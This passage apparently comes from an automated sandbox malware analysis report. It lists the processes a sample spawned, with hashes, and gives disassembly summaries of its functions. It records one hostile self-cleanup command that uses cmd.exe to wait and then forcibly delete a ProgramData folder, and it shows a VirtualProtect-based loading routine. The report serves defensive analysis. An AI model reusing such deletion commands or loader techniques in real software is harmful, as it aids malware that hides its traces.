                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0xeb0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:09:15:17
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                    Start time:09:15:21
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:0.7%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:17.1%
                                                                                                                                                                                                                      Total number of Nodes:76
                                                                                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                                                                                      execution_graph 37340 616df6 37341 616e02 ___scrt_is_nonwritable_in_current_image 37340->37341 37366 616ff5 37341->37366 37343 616e09 37344 616f5c 37343->37344 37350 616e33 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 37343->37350 37394 6177c5 4 API calls 2 library calls 37344->37394 37346 616f63 37395 61efa9 23 API calls __FrameHandler3::FrameUnwindToState 37346->37395 37348 616f69 37396 61ef6d 23 API calls __FrameHandler3::FrameUnwindToState 37348->37396 37352 616e52 37350->37352 37353 616ed3 37350->37353 37390 61ef83 41 API calls 4 library calls 37350->37390 37351 616f71 37374 6178da 37353->37374 37355 616ed9 37378 6120ad 37355->37378 37358 616eee 37391 617910 GetModuleHandleW 37358->37391 37360 616ef5 37360->37346 37361 616ef9 37360->37361 37362 616f02 37361->37362 37392 61ef5e 23 API calls __FrameHandler3::FrameUnwindToState 37361->37392 37393 617166 77 API calls ___scrt_uninitialize_crt 37362->37393 37365 616f0a 37365->37352 37367 616ffe 37366->37367 37397 6172cc IsProcessorFeaturePresent 37367->37397 37369 61700a 37398 61a03e 10 API calls 2 library calls 37369->37398 37371 61700f 37372 617013 37371->37372 37399 61a05d 7 API calls 2 library calls 37371->37399 37372->37343 37400 6186c0 37374->37400 37376 6178ed GetStartupInfoW 37377 617900 37376->37377 37377->37355 37379 6120fc 37378->37379 37401 611c89 37379->37401 37383 6125b0 37413 611fd5 37383->37413 37386 61296a 37388 611c89 72 API calls 37386->37388 37387 61299e CloseHandle SetCursorPos 37387->37358 37389 612980 GetConsoleWindow 37388->37389 37389->37387 37390->37353 37391->37360 37392->37362 37393->37365 37394->37346 37395->37348 37396->37351 37397->37369 37398->37371 37399->37372 37400->37376 37402 611cb5 37401->37402 37410 611d5a 37402->37410 37438 6136ed 43 API calls 6 library calls 37402->37438 37404 611dda 37427 6131f3 37404->37427 37406 611dee 37431 616cbd 37406->37431 37409 611e01 37412 61208f GetPEB 37409->37412 37410->37404 37439 612bbb 43 API calls 4 library calls 37410->37439 37440 612d7e 72 API calls 37410->37440 37412->37383 37414 612045 37413->37414 37423 612015 37413->37423 37416 616cbd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37414->37416 37417 612058 VirtualProtect 37416->37417 37417->37386 37417->37387 37419 61205c 37446 612db2 72 API calls 5 library calls 37419->37446 37422 612066 37447 613034 72 API calls 37422->37447 37423->37414 37423->37419 37443 6129e4 43 API calls 2 library calls 37423->37443 37444 611e05 72 API calls ctype 37423->37444 37445 612a71 41 API calls _Deallocate 37423->37445 37425 61206c 37448 612a71 41 API calls _Deallocate 37425->37448 37428 613200 37427->37428 37429 61320d std::ios_base::_Ios_base_dtor 37427->37429 37441 61127c 41 API calls _Deallocate 37428->37441 37429->37406 37432 616cc5 37431->37432 37433 616cc6 IsProcessorFeaturePresent 37431->37433 37432->37409 37435 6174dd 37433->37435 37442 6174a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37435->37442 37437 6175c0 37437->37409 37438->37402 37439->37410 37440->37410 37441->37429 37442->37437 37443->37423 37444->37423 37445->37423 37446->37422 37447->37425 37448->37414

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 006120AD Relevance: 9.5, APIs: 3, Strings: 2, Instructions: 764memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 6120ad-6120fa 1 6120fc-6120ff 0->1 2 61210e-612113 0->2 3 612101-61210c 1->3 4 612146-61215e 1->4 5 612115-61211b 2->5 3->5 7 61215f-61216e 4->7 5->4 6 61211d-612123 5->6 8 612125-612144 6->8 9 61217e-612184 6->9 7->9 10 612170-612173 7->10 8->7 13 612188-6121a1 9->13 11 612175-61217c 10->11 12 6121bc-6121c7 10->12 11->13 15 6121c9-6121cb 12->15 13->12 14 6121a3-6121a9 13->14 16 6121e4 14->16 17 6121ab-6121ba 14->17 15->16 18 6121cd-6121e2 15->18 19 6121ea-6121fb 16->19 17->15 18->19 20 612204-61220e 19->20 21 6121fd-612202 19->21 22 612210-612220 20->22 21->22 23 612222-612225 22->23 24 61222c-612232 22->24 25 612227-61222a 23->25 26 61226b-612276 23->26 27 612234-612244 24->27 25->27 29 612279-612295 26->29 27->26 28 612246-612249 27->28 30 6122b2-6122cf 28->30 31 61224b-612269 28->31 29->30 32 612297-6122b0 29->32 33 6122d5-6122dc 30->33 31->29 32->33 34 6122fc-612306 33->34 35 6122de-6122e1 33->35 36 61230a-612328 34->36 37 6122e3-6122fa 35->37 38 61232f 35->38 36->38 39 61232a-61232d 36->39 37->36 40 612335-6123aa call 611c89 38->40 39->40 43 6123ca-6123da 40->43 44 6123ac-6123c8 40->44 45 6123dc-6123f3 43->45 44->45 46 612401-612410 45->46 47 6123f5-6123ff 45->47 48 612413-612432 46->48 47->48 49 612453-61246d 48->49 50 612434-612439 48->50 53 61246e-612472 49->53 51 61243b-612451 50->51 52 61248c-61249a 50->52 51->53 55 6124a0-6124bc 52->55 53->52 54 612474-612477 53->54 56 6124d9-6124e6 54->56 57 612479-61248a 54->57 55->56 58 6124be-6124d7 55->58 59 6124e8-612502 56->59 57->55 58->59 60 612504-61250a 59->60 61 61250c-61250e 59->61 62 612512-612514 60->62 61->62 63 612516-61252a 62->63 64 61252c-61252f 62->64 65 612531-612557 63->65 64->65 66 612561-612568 65->66 67 612559-61255f 65->67 68 61256a-61257a 66->68 67->68 69 61258a-6125a1 68->69 70 61257c-612588 68->70 71 6125a3-61260f call 61208f 69->71 70->71 74 612611-61262c 71->74 75 61262e-61263b 71->75 76 61263e-612657 74->76 75->76 77 612659-61265f 76->77 78 61267f-61269b 76->78 79 612661-61267d 77->79 80 6126ca-6126ce 77->80 81 61269f-6126b4 78->81 79->81 83 6126cf-6126e3 80->83 81->80 82 6126b6-6126c8 81->82 82->83 84 612700-612705 83->84 85 6126e5-6126ea 83->85 88 612707-612719 84->88 86 612734-612746 85->86 87 6126ec-6126fe 85->87 90 612749-61275b 86->90 87->88 88->86 89 61271b-61271e 88->89 91 612720-612732 89->91 92 612765-612789 89->92 90->92 93 61275d-612763 90->93 91->90 94 61278c-6127ae 92->94 93->94 95 6127b0-6127c2 94->95 96 6127c4-6127de 94->96 97 6127df-6127ec 95->97 96->97 98 612800-612815 97->98 99 6127ee-6127f4 97->99 100 61281b-612823 98->100 101 612836-61283e 99->101 102 6127f6-6127fe 99->102 100->101 103 612825-612834 100->103 104 61283f-61285e 101->104 102->100 103->104 105 612860-612866 104->105 106 612882-612899 104->106 107 612868-612880 105->107 108 6128bb-6128d9 105->108 109 61289b-6128af 106->109 107->109 111 6128dc-6128e6 108->111 109->108 110 6128b1-6128b4 109->110 112 6128b6-6128b9 110->112 113 6128fb-612904 110->113 111->113 114 6128e8-6128f9 111->114 112->111 115 612908-612968 call 611fd5 VirtualProtect 113->115 114->115 118 61296a-612995 call 611c89 GetConsoleWindow 115->118 119 61299e-6129b8 CloseHandle SetCursorPos 115->119 118->119
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(00698AD8,?,00000040,?), ref: 00612963
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID: '$N
                                                                                                                                                                                                                      • API String ID: 544645111-2731476038
                                                                                                                                                                                                                      • Opcode ID: 9043a65889163a614cf48ca5001f965a9c8cfaea414a42ab2147e5feea910995
                                                                                                                                                                                                                      • Instruction ID: 406bbb475440beca1ea6b889430510c8c9b45e33c6e91c3a5130390f2a4fd542
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9043a65889163a614cf48ca5001f965a9c8cfaea414a42ab2147e5feea910995
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E112FF1BA30D1F07E70C60398D633E6944FD7AA720F495337AA67D77F4E26A09929284

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 0062A0B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,0062A3CE,00000002,00000000,?,?,?,0062A3CE,?,00000000), ref: 0062A149
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,0062A3CE,00000002,00000000,?,?,?,0062A3CE,?,00000000), ref: 0062A172
                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,0062A3CE,?,00000000), ref: 0062A187
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                      • Opcode ID: 4df8f9a42d0f63db06a4aee3f8208b8cb4b83f58fcf91a98e67b95805a87c6d3
                                                                                                                                                                                                                      • Instruction ID: 4413f59fa1976d30ce96c9cb654ffae97a1c5229eba16460bcbecd7456949317
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4df8f9a42d0f63db06a4aee3f8208b8cb4b83f58fcf91a98e67b95805a87c6d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E921B532700921ABEB308F94E809AD773A7AF50FB4F564024E906D7300E7B2DD51CB51
                                                                                                                                                                                                                      Function 0062A285 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0062A391
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0062A3DA
                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0062A3E9
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0062A431
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0062A450
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                      • Opcode ID: daf6ce300f1093c08b75009c1fa717581ad80b44f9ce8fc1eeba4c2de12e64f5
                                                                                                                                                                                                                      • Instruction ID: bfb22748b4d1c6c75ed6f8b5ae8e6a936ab7c715910702b515ea974c316638c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daf6ce300f1093c08b75009c1fa717581ad80b44f9ce8fc1eeba4c2de12e64f5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92518472A00A25AFDF10DFE5EC45AEE73BABF44700F044429E910EB291E7B199008F66
                                                                                                                                                                                                                      Function 00629921 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,0061F7B7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006299E2
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0061F7B7,?,?,?,00000055,?,-00000050,?,?), ref: 00629A0D
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00629B70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                      • API String ID: 607553120-905460609
                                                                                                                                                                                                                      • Opcode ID: cfc7da339628f22baaefd86713ea1e8966f6148da65ae1d49a163b50a5b38187
                                                                                                                                                                                                                      • Instruction ID: 818390ef7fcda5591a981e751b03f4b3c5d113e93674928a9f3f0eca066ccb14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfc7da339628f22baaefd86713ea1e8966f6148da65ae1d49a163b50a5b38187
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83712931A00B26AADB24AB74FC46BE773AAEF95310F14442DF905DB281EA71D940CF74
                                                                                                                                                                                                                      Function 006177C5 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006177D1
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0061789D
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006178B6
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 006178C0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                      • Opcode ID: 27a226c415d492b2f056bb50ac60fc729c569982c7002a6597026c24dc9ce039
                                                                                                                                                                                                                      • Instruction ID: f2b303aabcb7d8d280fdc9036fd2878a1036d51d94ca7c9af1a25dd8f06a9450
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27a226c415d492b2f056bb50ac60fc729c569982c7002a6597026c24dc9ce039
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31F575D052189BDF61EFA4D949BCDBBB8AF08300F1441EAE50CAB250EB719A85CF45
                                                                                                                                                                                                                      Function 00629D34 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629D88
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629DD2
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629E98
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                      • Opcode ID: dc73b1dadaa3203bcf0ee0b18354654abab9e3b1d5d626328f1d5ac77ac79dc8
                                                                                                                                                                                                                      • Instruction ID: c3e1139abc2938b57ccfb923525def2dd582cb23bb7fb0d9811265ae3232027e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc73b1dadaa3203bcf0ee0b18354654abab9e3b1d5d626328f1d5ac77ac79dc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B61D171500A279FDB68DF28ED82BFAB3AAEF44300F144079E945C6285EB34D981CF64
                                                                                                                                                                                                                      Function 0061B5E6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0061B6DE
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0061B6E8
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0061B6F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
